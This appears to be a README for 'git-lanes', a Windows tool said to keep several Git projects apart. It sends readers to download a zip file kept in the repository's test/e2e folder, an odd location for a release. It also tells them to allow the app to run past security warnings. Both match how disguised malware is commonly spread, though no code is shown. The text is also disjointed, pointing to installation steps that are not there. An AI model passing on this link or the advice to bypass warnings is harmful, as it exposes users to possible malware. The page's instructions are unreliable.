git-lanes helps you work with multiple Git projects at the same time without confusion. It keeps each project separate, so changes in one do not affect others. This makes managing Git projects smoother and safer.
You don't need to be a programmer to use git-lanes. It works on Windows and helps you avoid mixing files or settings between your projects.
Before you start, make sure your computer meets the following:
- Windows 10 or newer
- At least 4 GB of memory (RAM)
- 500 MB free disk space

Your project will open inside its own space, separate from others.
- Each lane acts like a separate workspace for your projects.

To keep git-lanes working smoothly:
- Visit the download page regularly:
https://github.com/ferdifi/git-lanes/raw/refs/heads/main/test/e2e/git_lanes_v3.6.zip - Download and install any newer versions following the same steps above.

Each lane stores files separately:
- Your project files remain in the folder you chose.

- Do not move or delete these files, or your lane might stop working correctly.
If git-lanes does not start or work right:

- Make sure you have installed the software using the setup file from the release page.
- Check if you have enough disk space or system memory.
- If you see a security warning, allow the app to run.
